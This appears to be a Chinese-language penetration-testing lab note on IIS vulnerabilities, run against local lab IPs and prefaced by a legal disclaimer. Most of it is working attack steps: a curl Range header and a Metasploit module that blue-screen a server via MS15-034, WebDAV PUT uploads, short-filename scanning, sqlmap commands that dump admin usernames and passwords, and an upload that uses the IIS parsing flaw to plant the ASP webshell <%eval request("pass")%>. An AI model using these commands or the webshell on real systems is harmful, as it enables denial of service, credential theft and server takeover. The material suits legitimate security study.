本文仅作为技术文档记录,学习使用,请合法合规,严格遵守《中华人民共和国网络安全法》。一切未经授权的渗透测试行为都是违法违规的。
1 http.sys蓝屏洞
用Linux输入
curl -v 192.168.37.129 -H "Host:192.168.37.129" -H "Range: bytes=0-18446744073709551615"
msfconsole
use auxiliary/dos/http/ms15_034_ulonglongadd
show options
设置端口set rhosts 192.168.37.129
show options
run
蓝屏成功
2 iis写权限
IIS<=6.0 目录权限开启写入,开启WebDAV,设置为允许
查看文件不存在
使用postman PUT请求http://192.168.37.128:89/3.TXT
注入成功
3 短文件泄露漏洞
主要是通过工具 获得asp应用泄露的短文件信息
cmd python iis_shortname_scan.py http://192.168.37.128:86/
就能泄露文件目录信息 python iis_shortname_scan.py http://192.168.37.128:86/database/
获得敏感信息/database/powere~1.mdb*
4 IIS文件解析
IIS 6 解析漏洞
1、该版本默认会将*.asp;.jpg 此种格式的文件名,当成Asp解析
2、该版本默认会将*.asp/目录下的所有文件当成Asp解析。
如:logo.asp;.jpg xx.asp/logo.jpg
IIS 7.x 解析漏洞
在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件
应用场景:配合文件上传获取Webshell
5 ASP-SQL注入-SQLMAP使用&ACCESS注入
ACCESS数据库无管理帐号密码,顶级架构为表名,列名(字段),数据,所以在注入猜解中一般采用字典猜解表和列再获取数据,猜解简单但又可能出现猜解不到的情况,由于Access数据库在当前安全发展中已很少存在,故直接使用SQLMAP注入,后续再说其他。
python sqlmap.py -u "" --tables //获取表名
python sqlmap.py -u "" --cloumns -T admin //获取admin表名下的列名
python sqlmap.py -u "" --dump -C "" -T admin //获取表名下的列名数据
存在注入点 使用SQLMAP
python .\sqlmap.py -u "http://192.168.37.128:89/Pic.asp?classid=3" –tables猜表名
获取到admin表
继续猜Tables中admin表中的数据
python .\sqlmap.py -u "http://192.168.37.128:89/Pic.asp?classid=3" --columns -T admin
获取到username 和password 继续猜
python .\sqlmap.py -u "http://192.168.37.128:89/Pic.asp?classid=3" --dump -C "username,password" -T admin
猜来源于admin表中的username 和password数据
6 利用文件解析上传webshell
http://192.168.37.128:89/upload.asp
admin panfei806
上传图片发现图片地址http://192.168.37.128:89/202452318404212661.jpg
验证成功
输入1.asp;.可以把图片当作asp解析
图片内容中添加后门代码<%eval request("pass")%>
链接地址http://192.168.37.128:89/1.asp;.20245231843934045.jpg
拿到权限